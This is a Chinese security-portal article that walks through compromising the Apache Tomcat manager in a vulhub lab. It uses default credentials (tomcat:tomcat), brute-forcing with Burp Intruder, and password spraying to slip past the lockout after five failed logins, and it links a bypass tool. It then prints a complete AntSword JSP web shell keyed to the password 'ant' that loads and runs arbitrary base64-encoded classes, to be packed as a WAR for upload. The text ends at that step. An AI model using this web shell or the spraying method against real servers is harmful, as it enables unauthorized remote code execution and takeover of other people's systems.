tomcat后台getshell - FreeBuf网络安全行业门户

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户，每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序把安全装进口袋

Web安全

tomcat后台getshell

2023-03-17 22:21:18

所属地上海

环境搭建

下载docker的地址：https://github.com/vulhub/vulhub/tree/master/tomcat/tomcat8

拉去镜像：docker-compose up -d
图片.png

漏洞复现

弱口令进入后台

确定能否访问8080端口http://192.168.183.136:8080/
图片.png
打开tomcat管理页面http://your-ip:8080/manager/html，输入弱密码tomcat:tomcat，即可访问后台：

在生产环境中需要爆破，我们可以使用intruder模块

用户名

分隔符

密码

base64编码

成功爆破

输入正确的账号密码后进入tomcat的后台管理页面
图片.png
上传war包即可直接getshell。

注意：在实际测试中，tomcat6/7/8+会针对登陆次数过多的用户进行锁定，经过统计分析，当登录错误>5次后，就会锁定用户。这时候我们就要考虑如何绕过。

CSDN上有个脚本利用的是占满tomcat缓存的方式绕过，当同一账号大于5次登录，就会采用脏数据去进行登录，直到缓存占满后，又会用剩下的可能存在的username进行登录。直到找到password为止。

tomcat暴破图形化—绕过tomcat 6/7/8的防暴破机制https://download.csdn.net/download/lwhat007/10164298

这里我们采用针对同一弱口令去爆破不同账号的方式进行猜解，将可能存在的username放入position1的位置，其次放置password在position3的位置，最后attack时爆破的顺序如下图，就不会针对同一账号锁定。这样做的好处在于我们针对同一个口令去爆破大量用户时，由于用户不同，不会被锁定，同时由于第二次使用这个账户爆破其他口令时，tomcat的缓存有很大几率被占满，就不会导致锁定。

原理就是密码喷洒
图片.png

上传war包getshell

图片.png
使用中国蚁剑生成一个 jsp马,将其单独放置于一个目录下,进入该目录

vim shell.jsp

密码：ant

<%!
    class U extends ClassLoader {
        U(ClassLoader c) {
            super(c);
        }
        public Class g(byte[] b) {
            return super.defineClass(b, 0, b.length);
        }
    }

    public byte[] base64Decode(String str) throws Exception {
        try {
            Class clazz = Class.forName("sun.misc.BASE64Decoder");
            return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
        } catch (Exception e) {
            Class clazz = Class.forName("java.util.Base64");
            Object decoder = clazz.getMethod("getDecoder").invoke(null);
            return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
        }
    }
%>
<%
    String cls = request.getParameter("ant");
    if (cls != null) {
        new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
    }
%>

将 shell.jsp 马打包成 war 包